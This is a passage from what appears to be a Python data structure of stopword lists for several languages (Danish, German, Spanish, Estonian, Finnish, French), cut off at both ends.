t",u"lille",u"man",u"mand",u"mange",u"med",u"meget",u"men",u"mens",u"mere",u"mig",u"ned",u"ni",u"nogen",u"noget",u"ny",u"nyt",u"nær",u"næste",u"næsten",u"og",u"op",u"otte",u"over",u"på",u"se",u"seks",u"ses",u"som",u"stor",u"store",u"syv",u"ti",u"til",u"to",u"tre",u"ud",u"var"],u"de":[u"Ernst",u"Ordnung",u"Schluss",u"a",u"ab",u"aber",u"ach",u"acht",u"achte",u"achten",u"achter",u"achtes",u"ag",u"alle",u"allein",u"allem",u"allen",u"aller",u"allerdings",u"alles",u"allgemeinen",u"als",u"also",u"am",u"an",u"andere",u"anderen",u"andern",u"anders",u"au",u"auch",u"auf",u"aus",u"ausser",u"ausserdem",u"außer",u"a
ußerdem",u"b",u"bald",u"bei",u"beide",u"beiden",u"beim",u"beispiel",u"bekannt",u"bereits",u"besonders",u"besser",u"besten",u"bin",u"bis",u"bisher",u"bist",u"c",u"d",u"d.h",u"da",u"dabei",u"dadurch",u"dafür",u"dagegen",u"daher",u"dahin",u"dahinter",u"damals",u"damit",u"danach",u"daneben",u"dank",u"dann",u"daran",u"darauf",u"daraus",u"darf",u"darfst",u"darin",u"darum",u"darunter",u"darüber",u"das",u"dasein",u"daselbst",u"dass",u"dasselbe",u"davon",u"davor",u"dazu",u"dazwischen",u"daß",u"dein",u"deine",u"deinem",u"deiner",u"dem",u"dementsprechend",u"demgegenüber",u"demgemäss",u"demgemäß",u"demselben",u"demzufolge",u"den",u"denen",u"denn",u"denselben",u"der",u"deren",u"derjenige",u"derjenigen",u"dermassen",u"dermaßen",u"derselbe",u"derselben",u"des",u"deshalb",u"desselben",u"dessen",u"deswegen",u"dich",u"die",u"diejenige",u"diejenigen",u"dies",u"diese",u"dieselbe",u"dieselben",u"diesem",u"diesen",u"dieser",u"dieses",u"dir",u"doch",u"dort",u"drei",u"drin",u"dritte",u"dritten",u"dritter",u"drittes",u"du",u"durch",u"durchaus",u"durfte",u"durften",u"dürfen",u"dürft",u"e",u"eben",u"ebenso",u"ehrlich",u"ei",u"ei,u",u"eigen",u"eigene",u"eigenen",u"eigener",u"eigenes",u"ein",u"einander",u"eine",u"einem",u"einen",u"einer",u"eines",u"einige",u"einigen",u"einiger",u"einiges",u"einmal",u"eins",u"elf",u"en",u"ende",u"endlich",u"entweder",u"er",u"erst",u"erste",u"ersten",u"erster",u"erstes",u"es",u"etwa",u"etwas",u"euch",u"euer",u"eure",u"f",u"folgende",u"früher",u"fünf",u"fünfte",u"fünften",u"fünfter",u"fünftes",u"für",u"g",u"gab",u"ganz",u"ganze",u"ganzen",u"ganzer",u"ganzes",u"gar",u"gedurft",u"gegen",u"gegenüber",u"gehabt",u"gehen",u"geht",u"gekannt",u"gekonnt",u"gemacht",u"gemocht",u"gemusst",u"genug",u"gerade",u"gern",u"gesagt",u"geschweige",u"gewesen",u"gewollt",u"geworden",u"gibt",u"ging",u"gleich",u"gott",u"gross",u"grosse",u"grossen",u"grosser",u"grosses",u"groß",u"große",u"großen",u"großer",u"großes",u"gut",u"gute",u"guter",u"gutes",u"h",u"habe",u"haben",u"habt",u"hast",u"hat",u"hatte",u"hatten",u"hattest",u"hattet",u"heisst",u"her",u"heute",u"hier",u"hin",u"hinter",u"hoch",u"hätte",u"hätten",u"i",u"ich",u"ihm",u"ihn",u"ihnen",u"ihr",u"ihre",u"ihrem",u"ihren",u"ihrer",u"ihres",u"im",u"immer",u"in",u"indem",u"infolgedessen",u"ins",u"irgend",u"ist",u"j",u"ja",u"jahr",u"jahre",u"jahren",u"je",u"jede",u"jedem",u"jeden",u"jeder",u"jedermann",u"jedermanns",u"jedes",u"jedoch",u"jemand",u"jemandem",u"jemanden",u"jene",u"jenem",u"jenen",u"jener",u"jenes",u"jetzt",u"k",u"kam",u"kann",u"kannst",u"kaum",u"kein",u"keine",u"keinem",u"keinen",u"keiner",u"kleine",u"kleinen",u"kleiner",u"kleines",u"kommen",u"kommt",u"konnte",u"konnten",u"kurz",u"können",u"könnt",u"könnte",u"l",u"lang",u"lange",u"leicht",u"leide",u"lieber",u"los",u"m",u"machen",u"macht",u"machte",u"mag",u"magst",u"mahn",u"mal",u"man",u"manche",u"manchem",u"manchen",u"mancher",u"manches",u"mann",u"mehr",u"mein",u"meine",u"meinem",u"meinen",u"meiner",u"meines",u"mensch",u"menschen",u"mich",u"mir",u"mit",u"mittel",u"mochte",u"mochten",u"morgen",u"muss",u"musst",u"musste",u"mussten",u"muß",u"mußt",u"möchte",u"mögen",u"möglich",u"mögt",u"müssen",u"müsst",u"müßt",u"n",u"na",u"nach",u"nachdem",u"nahm",u"natürlich",u"neben",u"nein",u"neue",u"neuen",u"neun",u"neunte",u"neunten",u"neunter",u"neuntes",u"nicht",u"nichts",u"nie",u"niemand",u"niemandem",u"niemanden",u"noch",u"nun",u"nur",u"o",u"ob",u"oben",u"oder",u"offen",u"oft",u"ohne",u"p",u"q",u"r",u"recht",u"rechte",u"rechten",u"rechter",u"rechtes",u"richtig",u"rund",u"s",u"sa",u"sache",u"sagt",u"sagte",u"s
ah",u"satt",u"schlecht",u"schon",u"sechs",u"sechste",u"sechsten",u"sechster",u"sechstes",u"sehr",u"sei",u"seid",u"seien",u"sein",u"seine",u"seinem",u"seinen",u"seiner",u"seines",u"seit",u"seitdem",u"selbst",u"sich",u"sie",u"sieben",u"siebente",u"siebenten",u"siebenter",u"siebentes",u"sind",u"so",u"solang",u"solche",u"solchem",u"solchen",u"solcher",u"solches",u"soll",u"sollen",u"sollst",u"sollt",u"sollte",u"sollten",u"sondern",u"sonst",u"soweit",u"sowie",u"später",u"startseite",u"statt",u"steht",u"suche",u"t",u"tag",u"tage",u"tagen",u"tat",u"teil",u"tel",u"tritt",u"trotzdem",u"tun",u"u",u"uhr",u"um",u"und",u"und?",u"uns",u"unser",u"unsere",u"unserer",u"unter",u"v",u"vergangenen",u"viel",u"viele",u"vielem",u"vielen",u"vielleicht",u"vier",u"vierte",u"vierten",u"vierter",u"viertes",u"vom",u"von",u"vor",u"w",u"wahr?",u"wann",u"war",u"waren",u"wart",u"warum",u"was",u"wegen",u"weil",u"weit",u"weiter",u"weitere",u"weiteren",u"weiteres",u"welche",u"welchem",u"welchen",u"welcher",u"welches",u"wem",u"wen",u"wenig",u"wenige",u"weniger",u"weniges",u"wenigstens",u"wenn",u"wer",u"werde",u"werden",u"werdet",u"weshalb",u"wessen",u"wie",u"wieder",u"wieso",u"will",u"willst",u"wir",u"wird",u"wirklich",u"wirst",u"wissen",u"wo",u"wohl",u"wollen",u"wollt",u"wollte",u"wollten",u"worden",u"wurde",u"wurden",u"während",u"währenddem",u"währenddessen",u"wäre",u"würde",u"würden",u"x",u"y",u"z",u"z.b",u"zehn",u"zehnte",u"zehnten",u"zehnter",u"zehntes",u"zeit",u"zu",u"zuerst",u"zugleich",u"zum",u"zunächst",u"zur",u"zurück",u"zusammen",u"zwanzig",u"zwar",u"zwei",u"zweite",u"zweiten",u"zweiter",u"zweites",u"zwischen",u"zwölf",u"über",u"überhaupt",u"übrigens"],u"es":[u"a",u"actualmente",u"acuerdo",u"adelante",u"ademas",u"además",u"adrede",u"afirmó",u"agregó",u"ahi",u"ahora",u"ahí",u"al",u"algo",u"alguna",u"algunas",u"alguno",u"algunos",u"algún",u"alli",u"allí",u"alrededor",u"ambos",u"ampleamos",u"antano",u"antaño",u"ante",u"anterior",u"antes",u"apenas",u"aproximadamente",u"aquel",u"aquella",u"aquellas",u"aquello",u"aquellos",u"aqui",u"aquél",u"aquélla",u"aquéllas",u"aquéllos",u"aquí",u"arriba",u"arribaabajo",u"aseguró",u"asi",u"así",u"atras",u"aun",u"aunque",u"ayer",u"añadió",u"aún",u"b",u"bajo",u"bastante",u"bien",u"breve",u"buen",u"buena",u"buenas",u"bueno",u"buenos",u"c",u"cada",u"casi",u"cerca",u"cierta",u"ciertas",u"cierto",u"ciertos",u"cinco",u"claro",u"comentó",u"como",u"con",u"conmigo",u"conocer",u"conseguimos",u"conseguir",u"considera",u"consideró",u"consigo",u"consigue",u"consiguen",u"consigues",u"contigo",u"contra",u"cosas",u"creo",u"cual",u"cuales",u"cualquier",u"cuando",u"cuanta",u"cuantas",u"cuanto",u"cuantos",u"cuatro",u"cuenta",u"cuál",u"cuáles",u"cuándo",u"cuánta",u"cuántas",u"cuánto",u"cuántos",u"cómo",u"d",u"da",u"dado",u"dan",u"dar",u"de",u"debajo",u"debe",u"deben",u"debido",u"decir",u"dejó",u"del",u"delante",u"demasiado",u"demás",u"dentro",u"deprisa",u"desde",u"despacio",u"despues",u"después",u"detras",u"detrás",u"dia",u"dias",u"dice",u"dicen",u"dicho",u"dieron",u"diferente",u"diferentes",u"dijeron",u"dijo",u"dio",u"donde",u"dos",u"durante",u"día",u"días",u"dónde",u"e",u"ejemplo",u"el",u"ella",u"ellas",u"ello",u"ellos",u"embargo",u"empleais",u"emplean",u"emplear",u"empleas",u"empleo",u"en",u"encima",u"encuentra",u"enfrente",u"enseguida",u"entonces",u"entre",u"era",u"eramos",u"eran",u"eras",u"eres",u"es",u"esa",u"esas",u"ese",u"eso",u"esos",u"esta",u"estaba",u"estaban",u"estado",u"estados",u"estais",u"estamos",u"estan",u"estar",u"estará",u"estas",u"este",u"esto",u"estos",u"estoy",u"estuvo",u"está",u"están
",u"ex",u"excepto",u"existe",u"existen",u"explicó",u"expresó",u"f",u"fin",u"final",u"fue",u"fuera",u"fueron",u"fui",u"fuimos",u"g",u"general",u"gran",u"grandes",u"gueno",u"h",u"ha",u"haber",u"habia",u"habla",u"hablan",u"habrá",u"había",u"habían",u"hace",u"haceis",u"hacemos",u"hacen",u"hacer",u"hacerlo",u"haces",u"hacia",u"haciendo",u"hago",u"han",u"hasta",u"hay",u"haya",u"he",u"hecho",u"hemos",u"hicieron",u"hizo",u"horas",u"hoy",u"hubo",u"i",u"igual",u"incluso",u"indicó",u"informo",u"informó",u"intenta",u"intentais",u"intentamos",u"intentan",u"intentar",u"intentas",u"intento",u"ir",u"j",u"junto",u"k",u"l",u"la",u"lado",u"largo",u"las",u"le",u"lejos",u"les",u"llegó",u"lleva",u"llevar",u"lo",u"los",u"luego",u"lugar",u"m",u"mal",u"manera",u"manifestó",u"mas",u"mayor",u"me",u"mediante",u"medio",u"mejor",u"mencionó",u"menos",u"menudo",u"mi",u"mia",u"mias",u"mientras",u"mio",u"mios",u"mis",u"misma",u"mismas",u"mismo",u"mismos",u"modo",u"momento",u"mucha",u"muchas",u"mucho",u"muchos",u"muy",u"más",u"mí",u"mía",u"mías",u"mío",u"míos",u"n",u"nada",u"nadie",u"ni",u"ninguna",u"ningunas",u"ninguno",u"ningunos",u"ningún",u"no",u"nos",u"nosotras",u"nosotros",u"nuestra",u"nuestras",u"nuestro",u"nuestros",u"nueva",u"nuevas",u"nuevo",u"nuevos",u"nunca",u"o",u"ocho",u"os",u"otra",u"otras",u"otro",u"otros",u"p",u"pais",u"para",u"parece",u"parte",u"partir",u"pasada",u"pasado",u"paìs",u"peor",u"pero",u"pesar",u"poca",u"pocas",u"poco",u"pocos",u"podeis",u"podemos",u"poder",u"podria",u"podriais",u"podriamos",u"podrian",u"podrias",u"podrá",u"podrán",u"podría",u"podrían",u"poner",u"por",u"porque",u"posible",u"primer",u"primera",u"primero",u"primeros",u"principalmente",u"pronto",u"propia",u"propias",u"propio",u"propios",u"proximo",u"próximo",u"próximos",u"pudo",u"pueda",u"puede",u"pueden",u"puedo",u"pues",u"q",u"qeu",u"que",u"quedó",u"queremos",u"quien",u"quienes",u"quiere",u"quiza",u"quizas",u"quizá",u"quizás",u"quién",u"quiénes",u"qué",u"r",u"raras",u"realizado",u"realizar",u"realizó",u"repente",u"respecto",u"s",u"sabe",u"sabeis",u"sabemos",u"saben",u"saber",u"sabes",u"salvo",u"se",u"sea",u"sean",u"segun",u"segunda",u"segundo",u"según",u"seis",u"ser",u"sera",u"será",u"serán",u"sería",u"señaló",u"si",u"sido",u"siempre",u"siendo",u"siete",u"sigue",u"siguiente",u"sin",u"sino",u"sobre",u"sois",u"sola",u"solamente",u"solas",u"solo",u"solos",u"somos",u"son",u"soy",u"soyos",u"su",u"supuesto",u"sus",u"suya",u"suyas",u"suyo",u"sé",u"sí",u"sólo",u"t",u"tal",u"tambien",u"también",u"tampoco",u"tan",u"tanto",u"tarde",u"te",u"temprano",u"tendrá",u"tendrán",u"teneis",u"tenemos",u"tener",u"tenga",u"tengo",u"tenido",u"tenía",u"tercera",u"ti",u"tiempo",u"tiene",u"tienen",u"toda",u"todas",u"todavia",u"todavía",u"todo",u"todos",u"total",u"trabaja",u"trabajais",u"trabajamos",u"trabajan",u"trabajar",u"trabajas",u"trabajo",u"tras",u"trata",u"través",u"tres",u"tu",u"tus",u"tuvo",u"tuya",u"tuyas",u"tuyo",u"tuyos",u"tú",u"u",u"ultimo",u"un",u"una",u"unas",u"uno",u"unos",u"usa",u"usais",u"usamos",u"usan",u"usar",u"usas",u"uso",u"usted",u"ustedes",u"v",u"va",u"vais",u"valor",u"vamos",u"van",u"varias",u"varios",u"vaya",u"veces",u"ver",u"verdad",u"verdadera",u"verdadero",u"vez",u"vosotras",u"vosotros",u"voy",u"vuestra",u"vuestras",u"vuestro",u"vuestros",u"w",u"x",u"y",u"ya",u"yo",u"z",u"él",u"ésa",u"ésas",u"ése",u"ésos",u"ésta",u"éstas",u"éste",u"éstos",u"última",u"últimas",u"último",u"últimos"],u"et":[u"aga",u"ei",u"et",u"ja",u"jah",u"kas",u"kui",u"kõik",u"ma",u"me",u"mida",u"midagi",u"mind",u"minu",u"mis",u"mu",u"mul",u"mulle",u"nad",u"nii",
u"oled",u"olen",u"oli",u"oma",u"on",u"pole",u"sa",u"seda",u"see",u"selle",u"siin",u"siis",u"ta",u"te",u"ära"],u"fi":[u"aiemmin",u"aika",u"aikaa",u"aikaan",u"aikaisemmin",u"aikaisin",u"aikajen",u"aikana",u"aikoina",u"aikoo",u"aikovat",u"aina",u"ainakaan",u"ainakin",u"ainoa",u"ainoat",u"aiomme",u"aion",u"aiotte",u"aist",u"aivan",u"ajan",u"alas",u"alemmas",u"alkuisin",u"alkuun",u"alla",u"alle",u"aloitamme",u"aloitan",u"aloitat",u"aloitatte",u"aloitattivat",u"aloitettava",u"aloitettevaksi",u"aloitettu",u"aloitimme",u"aloitin",u"aloitit",u"aloititte",u"aloittaa",u"aloittamatta",u"aloitti",u"aloittivat",u"alta",u"aluksi",u"alussa",u"alusta",u"annettavaksi",u"annetteva",u"annettu",u"ansiosta",u"antaa",u"antamatta",u"antoi",u"aoua",u"apu",u"asia",u"asiaa",u"asian",u"asiasta",u"asiat",u"asioiden",u"asioihin",u"asioita",u"asti",u"avuksi",u"avulla",u"avun",u"avutta",u"edelle",u"edelleen",u"edellä",u"edeltä",u"edemmäs",u"edes",u"edessä",u"edestä",u"ehkä",u"ei",u"eikä",u"eilen",u"eivät",u"eli",u"ellei",u"elleivät",u"ellemme",u"ellen",u"ellet",u"ellette",u"emme",u"en",u"enemmän",u"eniten",u"ennen",u"ensi",u"ensimmäinen",u"ensimmäiseksi",u"ensimmäisen",u"ensimmäisenä",u"ensimmäiset",u"ensimmäisiksi",u"ensimmäisinä",u"ensimmäisiä",u"ensimmäistä",u"ensin",u"entinen",u"entisen",u"entisiä",u"entisten",u"entistä",u"enää",u"eri",u"erittäin",u"erityisesti",u"eräiden",u"eräs",u"eräät",u"esi",u"esiin",u"esillä",u"esimerkiksi",u"et",u"eteen",u"etenkin",u"etessa",u"ette",u"ettei",u"että",u"haikki",u"halua",u"haluaa",u"haluamatta",u"haluamme",u"haluan",u"haluat",u"haluatte",u"haluavat",u"halunnut",u"halusi",u"halusimme",u"halusin",u"halusit",u"halusitte",u"halusivat",u"halutessa",u"haluton",u"he",u"hei",u"heidän",u"heihin",u"heille",u"heiltä",u"heissä",u"heistä",u"heitä",u"helposti",u"heti",u"hetkellä",u"hieman",u"hitaasti",u"hoikein",u"huolimatta",u"huomenna",u"hyvien",u"hyviin",u"hyviksi",u"hyville",u"hyviltä",u"hyvin",u"hyvinä",u"hyvissä",u"hyvistä",u"hyviä",u"hyvä",u"hyvät",u"hyvää",u"hän",u"häneen",u"hänelle",u"hänellä",u"häneltä",u"hänen",u"hänessä",u"hänestä",u"hänet",u"ihan",u"ilman",u"ilmeisesti",u"itse",u"itsensä",u"itseään",u"ja",u"jo",u"johon",u"joiden",u"joihin",u"joiksi",u"joilla",u"joille",u"joilta",u"joissa",u"joista",u"joita",u"joka",u"jokainen",u"jokin",u"joko",u"joku",u"jolla",u"jolle",u"jolloin",u"jolta",u"jompikumpi",u"jonka",u"jonkin",u"jonne",u"joo",u"jopa",u"jos",u"joskus",u"jossa",u"josta",u"jota",u"jotain",u"joten",u"jotenkin",u"jotenkuten",u"jotka",u"jotta",u"jouduimme",u"jouduin",u"jouduit",u"jouduitte",u"joudumme",u"joudun",u"joudutte",u"joukkoon",u"joukossa",u"joukosta",u"joutua",u"joutui",u"joutuivat",u"joutumaan",u"joutuu",u"joutuvat",u"juuri",u"jälkeen",u"jälleen",u"jää",u"kahdeksan",u"kahdeksannen",u"kahdella",u"kahdelle",u"kahdelta",u"kahden",u"kahdessa",u"kahdesta",u"kahta",u"kahteen",u"kai",u"kaiken",u"kaikille",u"kaikilta",u"kaikkea",u"kaikki",u"kaikkia",u"kaikkiaan",u"kaikkialla",u"kaikkialle",u"kaikkialta",u"kaikkien",u"kaikkin",u"kaksi",u"kannalta",u"kannattaa",u"kanssa",u"kanssaan",u"kanssamme",u"kanssani",u"kanssanne",u"kanssasi",u"kauan",u"kauemmas",u"kaukana",u"kautta",u"kehen",u"keiden",u"keihin",u"keiksi",u"keille",u"keillä",u"keiltä",u"keinä",u"keissä",u"keistä",u"keitten",u"keittä",u"keitä",u"keneen",u"keneksi",u"kenelle",u"kenellä",u"keneltä",u"kenen",u"kenenä",u"kenessä",u"kenestä",u"kenet",u"kenettä",u"kennessästä",u"kenties",u"kerran",u"kerta",u"kertaa",u"keskellä",u"kesken",u"keskimäärin",u"ketkä",u"ketä",u"kiitos",u"kohti",u"koko",u"kokonaan",u"kolmas",u"kolme",u
"kolmen",u"kolmesti",u"koska",u"koskaan",u"kovin",u"kuin",u"kuinka",u"kuinkan",u"kuitenkaan",u"kuitenkin",u"kuka",u"kukaan",u"kukin",u"kukka",u"kumpainen",u"kumpainenkaan",u"kumpi",u"kumpikaan",u"kumpikin",u"kun",u"kuten",u"kuuden",u"kuusi",u"kuutta",u"kylliksi",u"kyllä",u"kymmenen",u"kyse",u"liian",u"liki",u"lisäksi",u"lisää",u"lla",u"luo",u"luona",u"lähekkäin",u"lähelle",u"lähellä",u"läheltä",u"lähemmäs",u"lähes",u"lähinnä",u"lähtien",u"läpi",u"mahdollisimman",u"mahdollista",u"me",u"meidän",u"meille",u"meillä",u"melkein",u"melko",u"menee",u"meneet",u"menemme",u"menen",u"menet",u"menette",u"menevät",u"meni",u"menimme",u"menin",u"menit",u"menivät",u"mennessä",u"mennyt",u"menossa",u"mihin",u"mikin",u"miksi",u"mikä",u"mikäli",u"mikään",u"milloin",u"milloinkan",u"minne",u"minun",u"minut",u"minä",u"missä",u"mistä",u"miten",u"mitä",u"mitään",u"moi",u"molemmat",u"mones",u"monesti",u"monet",u"moni",u"moniaalla",u"moniaalle",u"moniaalta",u"monta",u"muassa",u"muiden",u"muita",u"muka",u"mukaan",u"mukaansa",u"mukana",u"mutta",u"muu",u"muualla",u"muualle",u"muualta",u"muuanne",u"muulloin",u"muun",u"muut",u"muuta",u"muutama",u"muutaman",u"muuten",u"myöhemmin",u"myös",u"myöskin",u"myöskään",u"myötä",u"ne",u"neljä",u"neljän",u"neljää",u"niiden",u"niin",u"niistä",u"niitä",u"noin",u"nopeammin",u"nopeasti",u"nopeiten",u"nro",u"nuo",u"nyt",u"näiden",u"näin",u"näissä",u"näissähin",u"näissälle",u"näissältä",u"näissästä",u"näitä",u"nämä",u"ohi",u"oikea",u"oikealla",u"oikein",u"ole",u"olemme",u"olen",u"olet",u"olette",u"oleva",u"olevan",u"olevat",u"oli",u"olimme",u"olin",u"olisi",u"olisimme",u"olisin",u"olisit",u"olisitte",u"olisivat",u"olit",u"olitte",u"olivat",u"olla",u"olleet",u"olli",u"ollut",u"oma",u"omaa",u"omaan",u"omaksi",u"omalle",u"omalta",u"oman",u"omassa",u"omat",u"omia",u"omien",u"omiin",u"omiksi",u"omille",u"omilta",u"omissa",u"omista",u"on",u"onkin",u"onko",u"ovat",u"paikoittain",u"paitsi",u"pakosti",u"paljon",u"paremmin",u"parempi",u"parhaillaan",u"parhaiten",u"perusteella",u"peräti",u"pian",u"pieneen",u"pieneksi",u"pienelle",u"pienellä",u"pieneltä",u"pienempi",u"pienestä",u"pieni",u"pienin",u"puolesta",u"puolestaan",u"päälle",u"runsaasti",u"saakka",u"sadam",u"sama",u"samaa",u"samaan",u"samalla",u"samallalta",u"samallassa",u"samallasta",u"saman",u"samat",u"samoin",u"sata",u"sataa",u"satojen",u"se",u"seitsemän",u"sekä",u"sen",u"seuraavat",u"siellä",u"sieltä",u"siihen",u"siinä",u"siis",u"siitä",u"sijaan",u"siksi",u"silloin",u"sillä",u"silti",u"sinne",u"sinua",u"sinulle",u"sinulta",u"sinun",u"sinussa",u"sinusta",u"sinut",u"sinä",u"sisäkkäin",u"sisällä",u"siten",u"sitten",u"sitä",u"ssa",u"sta",u"suoraan",u"suuntaan",u"suuren",u"suuret",u"suuri",u"suuria",u"suurin",u"suurten",u"taa",u"taas",u"taemmas",u"tahansa",u"tai",u"takaa",u"takaisin",u"takana",u"takia",u"tapauksessa",u"tarpeeksi",u"tavalla",u"tavoitteena",u"te",u"tietysti",u"todella",u"toinen",u"toisaalla",u"toisaalle",u"toisaalta",u"toiseen",u"toiseksi",u"toisella",u"toiselle",u"toiselta",u"toisemme",u"toisen",u"toisensa",u"toisessa",u"toisesta",u"toista",u"toistaiseksi",u"toki",u"tosin",u"tuhannen",u"tuhat",u"tule",u"tulee",u"tulemme",u"tulen",u"tulet",u"tulette",u"tulevat",u"tulimme",u"tulin",u"tulisi",u"tulisimme",u"tulisin",u"tulisit",u"tulisitte",u"tulisivat",u"tulit",u"tulitte",u"tulivat",u"tulla",u"tulleet",u"tullut",u"tuntuu",u"tuo",u"tuolla",u"tuolloin",u"tuolta",u"tuonne",u"tuskin",u"tykö",u"tähän",u"tällä",u"tällöin",u"tämä",u"tämän",u"tänne",u"tänä",u"tänään",u"tässä",u"tästä",u"täten",u"tätä",u"täysin",u"täytyvät",u"täytyy",u"täällä
",u"täältä",u"ulkopuolella",u"usea",u"useasti",u"useimmiten",u"usein",u"useita",u"uudeksi",u"uudelleen",u"uuden",u"uudet",u"uusi",u"uusia",u"uusien",u"uusinta",u"uuteen",u"uutta",u"vaan",u"vahemmän",u"vai",u"vaiheessa",u"vaikea",u"vaikean",u"vaikeat",u"vaikeilla",u"vaikeille",u"vaikeilta",u"vaikeissa",u"vaikeista",u"vaikka",u"vain",u"varmasti",u"varsin",u"varsinkin",u"varten",u"vasen",u"vasenmalla",u"vasta",u"vastaan",u"vastakkain",u"vastan",u"verran",u"vielä",u"vierekkäin",u"vieressä",u"vieri",u"viiden",u"viime",u"viimeinen",u"viimeisen",u"viimeksi",u"viisi",u"voi",u"voidaan",u"voimme",u"voin",u"voisi",u"voit",u"voitte",u"voivat",u"vuoden",u"vuoksi",u"vuosi",u"vuosien",u"vuosina",u"vuotta",u"vähemmän",u"vähintään",u"vähiten",u"vähän",u"välillä",u"yhdeksän",u"yhden",u"yhdessä",u"yhteen",u"yhteensä",u"yhteydessä",u"yhteyteen",u"yhtä",u"yhtäälle",u"yhtäällä",u"yhtäältä",u"yhtään",u"yhä",u"yksi",u"yksin",u"yksittäin",u"yleensä",u"ylemmäs",u"yli",u"ylös",u"ympäri",u"älköön",u"älä"],u"fr":[u"a",u"abord",u"absolument",u"afin",u"ah",u"ai",u"aie",u"ailleurs",u"ainsi",u"ait",u"allaient",u"allo",u"allons",u"allô",u"alors",u"anterieur",u"anterieure",u"anterieures",u"apres",u"après",u"as",u"assez",u"attendu",u"au",u"aucun",u"aucune",u"aujourd",u"aujourd'hui",u"aupres",u"auquel",u"aura",u"auraient",u"aurait",u"auront",u"aussi",u"autre",u"autrefois",u"autrement",u"autres",u"autrui",u"aux",u"auxquelles",u"auxquels",u"avaient",u"avais",u"avait",u"avant",u"avec",u"avoir",u"avons",u"ayant",u"b",u"bah",u"bas",u"basee",u"bat",u"beau",u"beaucoup",u"bien",u"bigre",u"boum",u"bravo",u"brrr",u"c",u"car",u"ce",u"ceci",u"cela",u"celle",u"celle-ci",u"celle-là",u"celles",u"celles-ci",u"celles-là",u"celui",u"celui-ci",u"celui-là",u"cent",u"cependant",u"certain",u"certaine",u"certaines",u"certains",u"certes",u"ces",u"cet",u"cette",u"ceux",u"ceux-ci",u"ceux-là",u"chacun",u"chacune",u"chaque",u"cher",u"chers",u"chez",u"chiche",u"chut",u"chère",u"chères",u"ci",u"cinq",u"cinquantaine",u"cinquante",u"cinquantième",u"cinquième",u"clac",u"clic",u"combien",u"comme",u"comment",u"comparable",u"comparables",u"compris",u"concernant",u"contre",u"couic",u"crac",u"d",u"da",u"dans",u"de",u"debout",u"dedans",u"dehors",u"deja",u"delà",u"depuis",u"dernier",u"derniere",u"derriere",u"derrière",u"des",u"desormais",u"desquelles",u"desquels",u"dessous",u"dessus",u"deux",u"deuxième",u"deuxièmement",u"devant",u"devers",u"devra",u"different",u"differentes",u"differents",u"différent",u"différente",u"différentes",u"différents",u"dire",u"directe",u"directement",u"dit",u"dite",u"dits",u"divers",u"diverse",u"diverses",u"dix",u"dix-huit",u"dix-neuf",u"dix-sept",u"dixième",u"doit",u"doivent",u"donc",u"dont",u"douze",u"douzième",u"dring",u"du",u"duquel",u"durant",u"dès",u"désormais",u"e",u"effet",u"egale",u"egalement",u"egales",u"eh",u"elle",u"elle-même",u"elles",u"elles-mêmes",u"en",u"encore",u"enfin",u"entre",u"envers",u"environ",u"es",u"est",u"et",u"etant",u"etc",u"etre",u"eu",u"euh",u"eux",u"eux-mêmes",u"exactement",u"excepté",u"extenso",u"exterieur",u"f",u"fais",u"faisaient",u"faisant",u"fait",u"façon",u"feront",u"fi",u"flac",u"floc",u"font",u"g",u"gens",u"h",u"ha",u"hein",u"hem",u"hep",u"hi",u"ho",u"holà",u"hop",u"hormis",u"hors",u"hou",u"houp",u"hue",u"hui",u"huit",u"huitième",u"hum",u"hurrah",u"hé",u"hélas",u"i",u"il",u"ils",u"importe",u"j",u"je",u"jusqu",u"jusque",u"juste",u"k",u"l",u"la",u"laisser",u"laquelle",u"las",u"le",u"lequel",u"les",u"lesquelles",u"lesquels",u"leur",u"leurs",u"longtemps",u"lors",u"lorsque",u"lui",u"lui-meme",u"lui-même",u
"là",u"lès",u"m",u"ma",u"maint",u"maintenant",u"mais",u"malgre",u"malgré",u"maximale",u"me",u"meme",u"memes",u"merci",u"mes",u"mien",u"mienne",u"miennes",u"miens",u"mille",u"mince",u"minimale",u"moi",u"moi-meme",u"moi-même",u"moindres",u"moins",u"mon",u"moyennant",u"multiple",u"multiples",u"même",u"mêmes",u"n",u"na",u"naturel",u"naturelle",u"naturelles",u"ne",u"neanmoins",u"necessaire",u"necessairement",u"neuf",u"neuvième",u"ni",u"nombreuses",u"nombreux",u"non",u"nos",u"notamment",u"notre",u"nous",u"nous-mêmes",u"nouveau",u"nul",u"néanmoins",u"nôtre",u"nôtres",u"o",u"oh",u"ohé",u"ollé",u"olé",u"on",u"ont",u"onze",u"onzième",u"ore",u"ou",u"ouf",u"ouias",u"oust",u"ouste",u"outre",u"ouvert",u"ouverte",u"ouverts",u"o|",u"où",u"p",u"paf",u"pan",u"par",u"parce",u"parfois",u"parle",u"parlent",u"parler",u"parmi",u"parseme",u"partant",u"particulier",u"particulière",u"particulièrement",u"pas",u"passé",u"pendant",u"pense",u"permet",u"personne",u"peu",u"peut",u"peuvent",u"peux",u"pff",u"pfft",u"pfut",u"pif",u"pire",u"plein",u"plouf",u"plus",u"plusieurs",u"plutôt",u"possessif",u"possessifs",u"possible",u"possibles",u"pouah",u"pour",u"pourquoi",u"pourrais",u"pourrait",u"pouvait",u"prealable",u"precisement",u"premier",u"première",u"premièrement",u"pres",u"probable",u"probante",u"procedant",u"proche",u"près",u"psitt",u"pu",u"puis",u"puisque",u"pur",u"pure",u"q",u"qu",u"quand",u"quant",u"quant-à-soi",u"quanta",u"quarante",u"quatorze",u"quatre",u"quatre-vingt",u"quatrième",u"quatrièmement",u"que",u"quel",u"quelconque",u"quelle",u"quelles",u"quelqu'un",u"quelque",u"quelques",u"quels",u"qui",u"quiconque",u"quinze",u"quoi",u"quoique",u"r",u"rare",u"rarement",u"rares",u"relative",u"relativement",u"remarquable",u"rend",u"rendre",u"restant",u"reste",u"restent",u"restrictif",u"retour",u"revoici",u"revoilà",u"rien",u"s",u"sa",u"sacrebleu",u"sait",u"sans",u"sapristi",u"sauf",u"se",u"sein",u"seize",u"selon",u"semblable",u"semblaient",u"semble",u"semblent",u"sent",u"sept",u"septième",u"sera",u"seraient",u"serait",u"seront",u"ses",u"seul",u"seule",u"seulement",u"si",u"sien",u"sienne",u"siennes",u"siens",u"sinon",u"six",u"sixième",u"soi",u"soi-même",u"soit",u"soixante",u"son",u"sont",u"sous",u"souvent",u"specifique",u"specifiques",u"speculatif",u"stop",u"strictement",u"subtiles",u"suffisant",u"suffisante",u"suffit",u"suis",u"suit",u"suivant",u"suivante",u"suivantes",u"suivants",u"suivre",u"superpose",u"sur",u"surtout",u"t",u"ta",u"tac",u"tant",u"tardive",u"te",u"tel",u"telle",u"tellement",u"telles",u"tels",u